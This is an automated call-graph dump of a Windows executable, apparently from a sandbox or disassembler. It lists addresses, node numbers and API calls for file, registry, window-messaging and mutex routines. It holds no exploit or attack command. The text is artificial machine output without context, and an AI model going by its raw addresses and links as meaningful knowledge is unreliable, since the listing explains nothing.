44b4ae 53498->53499 53501 44b4cd 53498->53501 53499->53501 53502 44b384 53499->53502 53503 44b3b7 53502->53503 53513 414ae0 53503->53513 53505 44b3ca 53506 44b3f7 73A1A570 53505->53506 53507 40357c 4 API calls 53505->53507 53517 41a1e0 53506->53517 53507->53506 53510 44b428 53525 44b0b8 53510->53525 53512 44b43c 73A1A480 53512->53501 53514 414aee 53513->53514 53515 4034e0 4 API calls 53514->53515 53516 414afb 53515->53516 53516->53505 53518 41a2a7 53517->53518 53519 41a20b 53517->53519 53520 403400 4 API calls 53518->53520 53522 403520 4 API calls 53519->53522 53521 41a2bf SelectObject 53520->53521 53521->53510 53523 41a263 53522->53523 53524 41a29b CreateFontIndirectA 53523->53524 53524->53518 53526 44b0cf 53525->53526 53527 44b162 53526->53527 53528 44b0e2 53526->53528 53529 44b14b 53526->53529 53527->53512 53528->53527 53531 402648 4 API calls 53528->53531 53530 44b15b DrawTextA 53529->53530 53530->53527 53532 44b0f3 53531->53532 53533 44b111 MultiByteToWideChar DrawTextW 53532->53533 53534 402660 4 API calls 53533->53534 53535 44b143 53534->53535 53535->53512 53536 448720 53537 448755 53536->53537 53538 44874e 53536->53538 53539 448769 53537->53539 53540 448524 7 API calls 53537->53540 53542 403400 4 API calls 53538->53542 53539->53538 53541 403494 4 API calls 53539->53541 53540->53539 53544 448782 53541->53544 53543 4488ff 53542->53543 53545 4037b8 4 API calls 53544->53545 53546 44879e 53545->53546 53547 4037b8 4 API calls 53546->53547 53548 4487ba 53547->53548 53548->53538 53549 4487ce 53548->53549 53550 4037b8 4 API calls 53549->53550 53551 4487e8 53550->53551 53552 431bc8 4 API calls 53551->53552 53553 44880a 53552->53553 53554 431c98 4 API calls 53553->53554 53561 44882a 53553->53561 53554->53553 53555 448880 53568 44232c 53555->53568 53556 448868 53556->53555 53580 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53556->53580 53560 4488b4 GetLastError 53581 4484b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53560->53581 53561->53556 53579 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53561->53579 53563 4488c3 53582 443608 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53563->53582 53565 4488d8 53583 443618 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53565->53583 53567 4488e0 53569 442365 53568->53569 53570 44330a 53568->53570 53571 403400 4 API calls 53569->53571 53572 403400 4 API calls 53570->53572 53573 44236d 53571->53573 53574 44331f 53572->53574 53575 431bc8 4 API calls 53573->53575 53574->53560 53577 442379 53575->53577 53576 4432fa 53576->53560 53577->53576 53584 441a04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53577->53584 53579->53561 53580->53555 53581->53563 53582->53565 53583->53567 53584->53577 53585 4165e4 73A25CF0 53586 42e3e7 SetErrorMode 49854 44138c 49855 441395 49854->49855 49856 4413a3 WriteFile 49854->49856 49855->49856 49857 4413ae 49856->49857 53587 40cee8 53588 40cef5 53587->53588 53589 40cefa 53587->53589 53591 406f38 CloseHandle 53588->53591 53591->53589 49858 490f80 49859 490fba 49858->49859 49860 490fbc 49859->49860 49861 490fc6 49859->49861 50058 409088 MessageBeep 49860->50058 49863 490ffe 49861->49863 49864 490fd5 49861->49864 49869 49100d 49863->49869 49870 491036 49863->49870 49866 446ff0 18 API calls 49864->49866 49868 490fe2 49866->49868 50059 406ba0 49868->50059 49873 446ff0 18 API calls 49869->49873 49879 49106e 49870->49879 49880 491045 49870->49880 49876 49101a 49873->49876 50067 406bf0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49876->50067 49886 49107d 49879->49886 49887 491096 49879->49887 49882 446ff0 18 API calls 49880->49882 49881 491025 50068 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49881->50068 49883 491052 49882->49883 50069 406c24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49883->50069 50071 407270 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 49886->50071 49892 4910ca 49887->49892 49893 4910a5 49887->49893 49888 49105d 50070 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49888->50070 49891 491085 50072 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49891->50072 49898 4910d9 49892->49898 49899 491102 49892->49899 49895 446ff0 18 API calls 49893->49895 49896 4910b2 49895->49896 50073 407298 49896->50073 49901 446ff0 18 API calls 49898->49901 49904 49113a 49899->49904 49905 491111 49899->49905 49900 4910ba 50076 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49900->50076 49903 4910e6 49901->49903 50077 42c7fc 49903->50077 49912 491149 49904->49912 49913 491186 49904->49913 49907 446ff0 18 API calls 49905->49907 49909 49111e 49907->49909 50087 4071e8 8 API calls 49909->50087 49915 446ff0 18 API calls 49912->49915 49919 4911be 49913->49919 49920 491195 49913->49920 49914 491129 50088 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49914->50088 49916 491158 49915->49916 49918 446ff0 18 API calls 49916->49918 49921 491169 49918->49921 49926 4911cd 49919->49926 49927 4911f6 49919->49927 49922 446ff0 18 API calls 49920->49922 50089 490c84 8 API calls 49921->50089 49924 4911a2 49922->49924 50091 42c89c 49924->50091 49925 491175 50090 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49925->50090 49930 446ff0 18 API calls 49926->49930 49935 49122e 49927->49935 49936 491205 49927->49936 49932 4911da 49930->49932 50097 42c8c4 49932->50097 49942 49123d 49935->49942 49943 491266 49935->49943 49938 446ff0 18 API calls 49936->49938 49939 491212 49938->49939 50106 42c8f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49939->50106 49945 446ff0 18 API calls 49942->49945 49948 49129e 49943->49948 49949 491275 49943->49949 49944 49121d 50107 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49944->50107 49947 49124a 49945->49947 50108 42c924 49947->50108 49956 4912ea 49948->49956 49957 4912ad 49948->49957 49951 446ff0 18 API calls 49949->49951 49953 491282 49951->49953 50114 42c94c 49953->50114 49962 4912f9 49956->49962 49963 49133c 49956->49963 49959 446ff0 18 API calls 49957->49959 49961 4912bc 49959->49961 49964 446ff0 18 API calls 49961->49964 49966 446ff0 18 API calls 49962->49966 49970 49134b 49963->49970 49971 4913af 49963->49971 49965 4912cd 49964->49965 50120 42c4f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 49965->50120 49968 49130c 49966->49968 49972 446ff0 18 API calls 49968->49972 49969 4912d9 50121 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49969->50121 50046 446ff0 49970->50046 49979 4913ee 49971->49979 49980 4913be 49971->49980 49975 49131d 49972->49975 50122 490e7c 12 API calls 49975->50122 49976 490fc1 50153 403420 49976->50153 49989 49142d 49979->49989 49990 4913fd 49979->49990 49983 446ff0 18 API calls 49980->49983 49982 49132b 50123 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49982->50123 49986 4913cb 49983->49986 49984 491366 49987 49136a 49984->49987 49988 49139f 49984->49988 50126 4528dc Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 49986->50126 49993 446ff0 18 API calls 49987->49993 50125 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49988->50125 50001 49146c 49989->50001 50002 49143c 49989->50002 49994 446ff0 18 API calls 49990->49994 49996 491379 49993->49996 49997 49140a 49994->49997 49995 4913d8 50127 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49995->50127 50051 452c54 49996->50051 50128 452744 49997->50128 50010 49147b 50001->50010 50011 4914b4 50001->50011 50006 446ff0 18 API calls 50002->50006 50003 4913e9 50003->49976 50004 491389 50124 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50004->50124 50005 491417 50135 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50005->50135 50009 491449 50006->50009 50136 452de4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50009->50136 50013 446ff0 18 API calls 50010->50013 50017 4914fc 50011->50017 50018 4914c3 50011->50018 50015 49148a 50013->50015 50014 491456 50137 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50014->50137 50019 446ff0 18 API calls 50015->50019 50024 49150f 50017->50024 50029 4915c5 50017->50029 50020 446ff0 18 API calls 50018->50020 50021 49149b 50019->50021 50022 4914d2 50020->50022 50138 447270 50021->50138 50023 446ff0 18 API calls 50022->50023 50025 4914e3 50023->50025 50027 446ff0 18 API calls 50024->50027 50033 447270 5 API calls 50025->50033 50028 49153c 50027->50028 50030 446ff0 18 API calls 50028->50030 50029->49976 50147 446f94 18 API calls 50029->50147 50031 491553 50030->50031 50144 407dcc 7 API calls 50031->50144 50033->49976 50034 4915de 50148 42e8c0 FormatMessageA 50034->50148 50039 491575 50040 446ff0 18 API calls 50039->50040 50041 491589 50040->50041 50145 4084f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50041->50145 50043 491594 50146 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50043->50146 50045 4915a0 50047 446ff8 50046->50047 50161 436070 50047->50161 50049 447017 50050 42c600 7 API calls 50049->50050 50050->49984 50211 4526f8 50051->50211 50053 452c71 50053->50004 50054 452c6d 50054->50053 50055 452c95 MoveFileA GetLastError 50054->50055 50217 452734 50055->50217 50058->49976 50060 406baf 50059->50060 50061 406bd1 50060->50061 50062 406bc8 50060->50062 50220 403778 50061->50220 50063 403400 4 API calls 50062->50063 50064 406bcf 50063->50064 50066 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50064->50066 50066->49976 50067->49881 50068->49976 50069->49888 50070->49976 50071->49891 50072->49976 50227 403738 50073->50227 50076->49976 50078 403738 50077->50078 50079 42c81f GetFullPathNameA 50078->50079 50080 42c842 50079->50080 50081 42c82b 50079->50081 50083 403494 4 API calls 50080->50083 50081->50080 50082 42c833 50081->50082 50084 4034e0 4 API calls 50082->50084 50085 42c840 50083->50085 50084->50085 50086 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50085->50086 50086->49976 50087->49914 50088->49976 50089->49925 50090->49976 50229 42c794 50091->50229 50094 403778 4 API calls 50095 42c8bd 50094->50095 50096 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50095->50096 50096->49976 50244 42c66c 50097->50244 50100 42c8e1 50103 403778 4 API calls 50100->50103 50101 42c8d8 50102 403400 4 API calls 50101->50102 50104 42c8df 50102->50104 50103->50104 50105 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50104->50105 50105->49976 50106->49944 50107->49976 50109 42c794 IsDBCSLeadByte 50108->50109 50110 42c934 50109->50110 50111 403778 4 API calls 50110->50111 50112 42c946 50111->50112 50113 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50112->50113 50113->49976 50115 42c794 IsDBCSLeadByte 50114->50115 50116 42c95c 50115->50116 50117 403778 4 API calls 50116->50117 50118 42c96d 50117->50118 50119 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50118->50119 50119->49976 50120->49969 50121->49976 50122->49982 50123->49976 50124->49976 50125->49976 50126->49995 50127->50003 50129 4526f8 2 API calls 50128->50129 50130 45275a 50129->50130 50131 45275e 50130->50131 50132 45277c CreateDirectoryA GetLastError 50130->50132 50131->50005 50133 452734 Wow64RevertWow64FsRedirection 50132->50133 50134 4527a2 50133->50134 50134->50005 50135->49976 50136->50014 50137->49976 50139 447278 50138->50139 50247 4363d8 VariantClear 50139->50247 50141 44729b 50143 4472b2 50141->50143 50248 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50141->50248 50143->49976 50144->50039 50145->50043 50146->50045 50147->50034 50149 42e8e6 50148->50149 50150 4034e0 4 API calls 50149->50150 50151 42e903 50150->50151 50152 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50151->50152 50152->49976 50154 403426 50153->50154 50155 40344b 50154->50155 50156 402660 4 API calls 50154->50156 50157 403400 50155->50157 50156->50154 50158 403406 50157->50158 50159 40341f 50157->50159 50158->50159 50160 402660 4 API calls 50158->50160 50160->50159 50162 43607c 50161->50162 50164 43609e 50161->50164 50162->50164 50181 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50162->50181 50163 436121 50190 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50163->50190 50164->50163 50166 4360f1 50164->50166 50167 4360e5 50164->50167 50168 436115 50164->50168 50169 436109 50164->50169 50174 4360fd 50164->50174 50173 403510 4 API calls 50166->50173 50182 403510 50167->50182 50189 4040e8 18 API calls 50168->50189 50185 403494 50169->50185 50171 436132 50171->50049 50178 4360fa 50173->50178 50174->50049 50178->50049 50180 43611e 50180->50049 50181->50164 50191 4034e0 50182->50191 50186 403498 50185->50186 50187 4034ba 50186->50187 50206 402660 50186->50206 50187->50049 50189->50180 50190->50171 50196 4034bc 50191->50196 50193 4034f0 50194 403400 4 API calls 50193->50194 50195 403508 50194->50195 50195->50049 50197 4034c0 50196->50197 50198 4034dc 50196->50198 50201 402648 50197->50201 50198->50193 50200 4034c9 50200->50193 50202 40264c 50201->50202 50203 402656 50201->50203 50202->50203 50205 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50202->50205 50203->50200 50203->50203 50205->50203 50207 402664 50206->50207 50208 40266e 50206->50208 50207->50208 50210 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50207->50210 50208->50187 50208->50208 50210->50208 50212 452706 50211->50212 50213 452702 50211->50213 50214 45270f Wow64DisableWow64FsRedirection 50212->50214 50215 452728 SetLastError 50212->50215 50213->50054 50216 452723 50214->50216 50215->50216 50216->50054 50218 452743 50217->50218 50219 452739 Wow64RevertWow64FsRedirection 50217->50219 50218->50004 50219->50218 50221 4037aa 50220->50221 50223 40377d 50220->50223 50222 403400 4 API calls 50221->50222 50226 4037a0 50222->50226 50223->50221 50224 403791 50223->50224 50225 4034e0 4 API calls 50224->50225 50225->50226 50226->50064 50228 40373c SetCurrentDirectoryA 50227->50228 50228->49900 50234 42c674 50229->50234 50231 42c7f3 50231->50094 50233 42c7a9 50233->50231 50241 42c43c IsDBCSLeadByte 50233->50241 50237 42c685 50234->50237 50235 42c6e9 50238 42c6e4 50235->50238 50243 42c43c IsDBCSLeadByte 50235->50243 50237->50235 50239 42c6a3 50237->50239 50238->50233 50239->50238 50242 42c43c IsDBCSLeadByte 50239->50242 50241->50233 50242->50239 50243->50238 50245 42c674 IsDBCSLeadByte 50244->50245 50246 42c673 50245->50246 50246->50100 50246->50101 50247->50141 50248->50143 50249 480002 50250 48000b 50249->50250 50252 480036 50249->50252 50251 480028 50250->50251 50250->50252 50663 4766e4 189 API calls 50251->50663 50253 480075 50252->50253 50665 47eaec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50252->50665 50254 480099 50253->50254 50257 48008c 50253->50257 50258 48008e 50253->50258 50262 4800d5 50254->50262 50263 4800b7 50254->50263 50267 47eb30 42 API calls 50257->50267 50667 47ebc4 42 API calls 50258->50667 50259 48002d 50259->50252 50664 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50259->50664 50260 480068 50666 47eb54 42 API calls 50260->50666 50670 47e984 24 API calls 50262->50670 50268 4800cc 50263->50268 50668 47eb54 42 API calls 50263->50668 50267->50254 50669 47e984 24 API calls 50268->50669 50270 4800d3 50272 4800eb 50270->50272 50273 4800e5 50270->50273 50274 4800e9 50272->50274 50275 47eb30 42 API calls 50272->50275 50273->50274 50375 47eb30 50273->50375 50380 47bf1c 50274->50380 50275->50274 50739 47e618 42 API calls 50375->50739 50377 47eb4b 50740 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50377->50740 50741 42d890 GetWindowsDirectoryA 50380->50741 50382 47bf3a 50383 403450 4 API calls 50382->50383 50384 47bf47 50383->50384 50743 42d8bc GetSystemDirectoryA 50384->50743 50386 47bf4f 50387 403450 4 API calls 50386->50387 50388 47bf5c 50387->50388 50745 42d8e8 50388->50745 50390 47bf64 50391 403450 4 API calls 50390->50391 50392 47bf71 50391->50392 50393 47bf96 50392->50393 50394 47bf7a 50392->50394 50396 403400 4 API calls 50393->50396 50801 42d200 50394->50801 50398 47bf94 50396->50398 50400 47bfdb 50398->50400 50402 42c8c4 5 API calls 50398->50402 50399 403450 4 API calls 50399->50398 50749 47bda4 50400->50749 50404 47bfb6 50402->50404 50406 403450 4 API calls 50404->50406 50405 403450 4 API calls 50409 47bff7 50405->50409 50407 47bfc3 50406->50407 50407->50400 50410 403450 4 API calls 50407->50410 50408 47c015 50412 47bda4 8 API calls 50408->50412 50409->50408 50411 4035c0 4 API calls 50409->50411 50410->50400 50411->50408 50413 47c024 50412->50413 50414 403450 4 API calls 50413->50414 50415 47c031 50414->50415 50416 47c059 50415->50416 50417 42c3f4 5 API calls 50415->50417 50418 47c0c0 50416->50418 50422 47bda4 8 API calls 50416->50422 50419 47c047 50417->50419 50420 47c0ea 50418->50420 50421 47c0c9 50418->50421 50423 4035c0 4 API calls 50419->50423 50760 42c3f4 50420->50760 50424 42c3f4 5 API calls 50421->50424 50425 47c071 50422->50425 50423->50416 50427 47c0d6 50424->50427 50428 403450 4 API calls 50425->50428 50430 4035c0 4 API calls 50427->50430 50431 47c07e 50428->50431 50429 47c0f7 50770 4035c0 50429->50770 50433 47c0e8 50430->50433 50434 47c091 50431->50434 50809 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50431->50809 50792 47be88 50433->50792 50436 47bda4 8 API calls 50434->50436 50438 47c0a0 50436->50438 50440 403450 4 API calls 50438->50440 50663->50259 50665->50260 50666->50253 50667->50254 50668->50268 50669->50270 50670->50270 50739->50377 50742 42d8b1 50741->50742 50742->50382 50744 42d8dd 50743->50744 50744->50386 50746 403400 4 API calls 50745->50746 50747 42d8f8 GetModuleHandleA GetProcAddress 50746->50747 50748 42d911 50747->50748 50748->50390 50811 42de14 50749->50811 50751 47bdca 50752 47bdf0 50751->50752 50753 47bdce 50751->50753 50755 403400 4 API calls 50752->50755 50814 42dd44 50753->50814 50756 47bdf7 50755->50756 50756->50405 50758 47bde5 RegCloseKey 50758->50756 50759 403400 4 API calls 50759->50758 50761 42c421 50760->50761 50762 42c3fe 50760->50762 50764 403494 4 API calls 50761->50764 50848 42c974 CharPrevA 50762->50848 50765 42c42a 50764->50765 50765->50429 50766 42c405 50766->50761 50767 42c410 50766->50767 50768 4035c0 4 API calls 50767->50768 50769 42c41e 50768->50769 50769->50429 50771 4035c4 50770->50771 50793 47be96 50792->50793 50802 4038a4 4 API calls 50801->50802 50803 42d213 50802->50803 50804 42d22a GetEnvironmentVariableA 50803->50804 50808 42d23d 50803->50808 50849 42dbc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50803->50849 50804->50803 50805 42d236 50804->50805 50806 403400 4 API calls 50805->50806 50806->50808 50808->50399 50809->50434 50812 42de25 RegOpenKeyExA 50811->50812 50813 42de1f 50811->50813 50812->50751 50813->50812 50817 42dbf8 50814->50817 50818 42dc1e RegQueryValueExA 50817->50818 50824 42dc41 50818->50824 50833 42dc63 50818->50833 50819 403400 4 API calls 50821 42dd2f 50819->50821 50820 42dc5b 50822 403400 4 API calls 50820->50822 50821->50758 50821->50759 50822->50833 50823 4034e0 4 API calls 50823->50824 50824->50820 50824->50823 50824->50833 50834 403744 50824->50834 50826 42dc98 RegQueryValueExA 50826->50818 50827 42dcb4 50826->50827 50827->50833 50838 4038a4 50827->50838 50830 42dd08 50831 403450 4 API calls 50830->50831 50831->50833 50832 403744 4 API calls 50832->50830 50833->50819 50835 40374a 50834->50835 50837 40375b 50834->50837 50836 4034bc 4 API calls 50835->50836 50835->50837 50836->50837 50837->50826 50839 4038b1 50838->50839 50840 4038e1 50838->50840 50841 4038da 50839->50841 50843 4038bd 50839->50843 50842 403400 4 API calls 50840->50842 50844 4034bc 4 API calls 50841->50844 50845 4038cb 50842->50845 50847 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50843->50847 50844->50840 50845->50830 50845->50832 50847->50845 50848->50766 50849->50803 52914 491d44 52915 491d78 52914->52915 52916 491d7a 52915->52916 52917 491d8e 52915->52917 53050 446f94 18 API calls 52916->53050 52920 491dca 52917->52920 52921 491d9d 52917->52921 52919 491d83 Sleep 52976 491dc5 52919->52976 52926 491dd9 52920->52926 52927 491e06 52920->52927 52922 446ff0 18 API calls 52921->52922 52925 491dac 52922->52925 52923 403420 4 API calls 52924 492238 52923->52924 52928 491db4 FindWindowA 52925->52928 52929 446ff0 18 API calls 52926->52929 52932 491e5c 52927->52932 52933 491e15 52927->52933 52931 447270 5 API calls 52928->52931 52930 491de6 52929->52930 52934 491dee FindWindowA 52930->52934 52931->52976 52938 491eb8 52932->52938 52939 491e6b 52932->52939 53051 446f94 18 API calls 52933->53051 52936 447270 5 API calls 52934->52936 52992 491e01 52936->52992 52937 491e21 53052 446f94 18 API calls 52937->53052 52945 491f14 52938->52945 52946 491ec7 52938->52946 53055 446f94 18 API calls 52939->53055 52942 491e2e 53053 446f94 18 API calls 52942->53053 52943 491e77 53056 446f94 18 API calls 52943->53056 52956 491f4e 52945->52956 52957 491f23 52945->52957 53060 446f94 18 API calls 52946->53060 52948 491e3b 53054 446f94 18 API calls 52948->53054 52950 491e84 53057 446f94 18 API calls 52950->53057 52952 491e46 SendMessageA 52955 447270 5 API calls 52952->52955 52953 491ed3 53061 446f94 18 API calls 52953->53061 52955->52992 52967 491f5d 52956->52967 52973 491f9c 52956->52973 52960 446ff0 18 API calls 52957->52960 52959 491e91 53058 446f94 18 API calls 52959->53058 52963 491f30 52960->52963 52961 491ee0 53062 446f94 18 API calls 52961->53062 52969 491f38 RegisterClipboardFormatA 52963->52969 52965 491e9c PostMessageA 53059 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52965->53059 52966 491eed 53063 446f94 18 API calls 52966->53063 53065 446f94 18 API calls 52967->53065 52972 447270 5 API calls 52969->52972 52972->52976 52977 491fab 52973->52977 52978 491ff0 52973->52978 52974 491ef8 SendNotifyMessageA 53064 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52974->53064 52975 491f69 53066 446f94 18 API calls 52975->53066 52976->52923 53068 446f94 18 API calls 52977->53068 52986 491fff 52978->52986 52987 492044 52978->52987 52981 491f76 53067 446f94 18 API calls 52981->53067 52984 491fb7 53069 446f94 18 API calls 52984->53069 52985 491f81 SendMessageA 52989 447270 5 API calls 52985->52989 53072 446f94 18 API calls 52986->53072 52995 492053 52987->52995 52996 4920a6 52987->52996 52989->52992 52991 491fc4 53070 446f94 18 API calls 52991->53070 52992->52976 52993 49200b 53073 446f94 18 API calls 52993->53073 52999 446ff0 18 API calls 52995->52999 53004 49212d 52996->53004 53005 4920b5 52996->53005 52998 491fcf PostMessageA 53071 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52998->53071 53002 492060 52999->53002 53000 492018 53074 446f94 18 API calls 53000->53074 53006 42e38c 2 API calls 53002->53006 53015 49213c 53004->53015 53016 492162 53004->53016 53008 446ff0 18 API calls 53005->53008 53009 49206d 53006->53009 53007 492023 SendNotifyMessageA 53075 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53007->53075 53011 4920c4 53008->53011 53012 492083 GetLastError 53009->53012 53013 492073 53009->53013 53076 446f94 18 API calls 53011->53076 53017 447270 5 API calls 53012->53017 53014 447270 5 API calls 53013->53014 53018 492081 53014->53018 53081 446f94 18 API calls 53015->53081 53023 492171 53016->53023 53024 492194 53016->53024 53017->53018 53022 447270 5 API calls 53018->53022 53021 492146 FreeLibrary 53082 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53021->53082 53022->52976 53027 446ff0 18 API calls 53023->53027 53033 4921a3 53024->53033 53039 4921d7 53024->53039 53025 4920d7 GetProcAddress 53028 49211d 53025->53028 53029 4920e3 53025->53029 53030 49217d 53027->53030 53080 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53028->53080 53077 446f94 18 API calls 53029->53077 53035 492185 CreateMutexA 53030->53035 53083 48c174 18 API calls 53033->53083 53034 4920ef 53078 446f94 18 API calls 53034->53078 53035->52976 53038 4920fc 53042 447270 5 API calls 53038->53042 53039->52976 53085 48c174 18 API calls 53039->53085 53041 4921af 53043 4921c0 OemToCharBuffA 53041->53043 53044 49210d 53042->53044 53084 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53043->53084 53079 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53044->53079 53047 4921f2 53048 492203 CharToOemBuffA 53047->53048 53086 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53048->53086 53050->52919 53051->52937 53052->52942 53053->52948 53054->52952 53055->52943 53056->52950 53057->52959 53058->52965 53059->52992 53060->52953 53061->52961 53062->52966 53063->52974 53064->52976 53065->52975 53066->52981 53067->52985 53068->52984 53069->52991 53070->52998 53071->52992 53072->52993 53073->53000 53074->53007 53075->52976 53076->53025 53077->53034 53078->53038 53079->52992 53080->52992 53081->53021 53082->52976 53083->53041 53084->52976 53085->53047 53086->52976 53087 41ee4c 53088 41ee91 53087->53088 53089 41ee5b IsWindowVisible 53087->53089 53089->53088 53090 41ee65 IsWindowEnabled 53089->53090 53090->53088 53091 41ee6f 53090->53091 53092 402648 4 API calls 53091->53092 53093 41ee79 EnableWindow 53092->53093 53093->53088 53592 47ff68 53597 450fd8 53592->53597 53594 47ff7c 53607 47f054 53594->53607 53596 47ffa0 53598 450fe5 53597->53598 53600 451039 53598->53600 53616 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53598->53616 53613 450e5c 53600->53613 53604 451061 53606 4510a4 53604->53606 53618 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53604->53618 53606->53594 53623 40b5b0 53607->53623 53609 47f0c1 53609->53596 53611 47f076 53611->53609 53627 4069cc 53611->53627 53630 476428 53611->53630 53619 450e08 53613->53619 53616->53600 53617 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53617->53604 53618->53606 53620 450e2b 53619->53620 53621 450e1a 53619->53621 53620->53604 53620->53617 53622 450e1f InterlockedExchange 53621->53622 53622->53620 53624 40b5bb 53623->53624 53625 40b5db 53624->53625 53646 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53624->53646 53625->53611 53628 402648 4 API calls 53627->53628 53629 4069d7 53628->53629 53629->53611 53643 476459 53630->53643 53644 4764a2 53630->53644 53631 4764ed 53647 451268 53631->53647 53632 451268 21 API calls 53632->53643 53634 476504 53636 403420 4 API calls 53634->53636 53635 4038a4 4 API calls 53635->53643 53638 47651e 53636->53638 53637 4038a4 4 API calls 53637->53644 53638->53611 53639 403744 4 API calls 53639->53643 53640 403450 4 API calls 53640->53643 53641 403744 4 API calls 53641->53644 53642 403450 4 API calls 53642->53644 53643->53632 53643->53635 53643->53639 53643->53640 53643->53644 53644->53631 53644->53637 53644->53641 53644->53642 53645 451268 21 API calls 53644->53645 53645->53644 53646->53625 53648 451283 53647->53648 53649 451278 53647->53649 53653 45120c 21 API calls 53648->53653 53649->53634 53651 45128e 53651->53649 53654 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53651->53654 53653->53651 53654->53649 53094 41fb50 53095 41fb59 53094->53095 53098 41fdf4 53095->53098 53097 41fb66 53099 41fee6 53098->53099 53100 41fe0b 53098->53100 53099->53097 53100->53099 53119 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53100->53119 53102 41fe41 53103 41fe45 53102->53103 53104 41fe6b 53102->53104 53120 41fb94 53103->53120 53129 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53104->53129 53107 41fe79 53109 41fea3 53107->53109 53110 41fe7d 53107->53110 53113 41fb94 10 API calls 53109->53113 53112 41fb94 10 API calls 53110->53112 53111 41fb94 10 API calls 53118 41fe69 53111->53118 53114 41fe8f 53112->53114 53115 41feb5 53113->53115 53116 41fb94 10 API calls 53114->53116 53117 41fb94 10 API calls 53115->53117 53116->53118 53117->53118 53118->53097 53119->53102 53121 41fbaf 53120->53121 53122 41f934 4 API calls 53121->53122 53123 41fbc5 53121->53123 53122->53123 53130 41f934 53123->53130 53125 41fc0d 53126 41fc30 SetScrollInfo 53125->53126 53138 41fa94 53126->53138 53129->53107 53149 4181d8 53130->53149 53132 41f951 GetWindowLongA 53133 41f98e 53132->53133 53134 41f96e 53132->53134 53152 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53133->53152 53151 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53134->53151 53137 41f97a 53137->53125 53139 41faa2 53138->53139 53140 41faaa 53138->53140 53139->53111 53141 41fae9 53140->53141 53142 41fad9 53140->53142 53148 41fae7 53140->53148 53154 417e40 IsWindowVisible ScrollWindow SetWindowPos 53141->53154 53153 417e40 IsWindowVisible ScrollWindow SetWindowPos 53142->53153 53143 41fb29 GetScrollPos 53143->53139 53146 41fb34 53143->53146 53147 41fb43 SetScrollPos 53146->53147 53147->53139 53148->53143 53150 4181e2 53149->53150 53150->53132 53151->53137 53152->53137 53153->53148 53154->53148 53155 420590 53156 4205a3 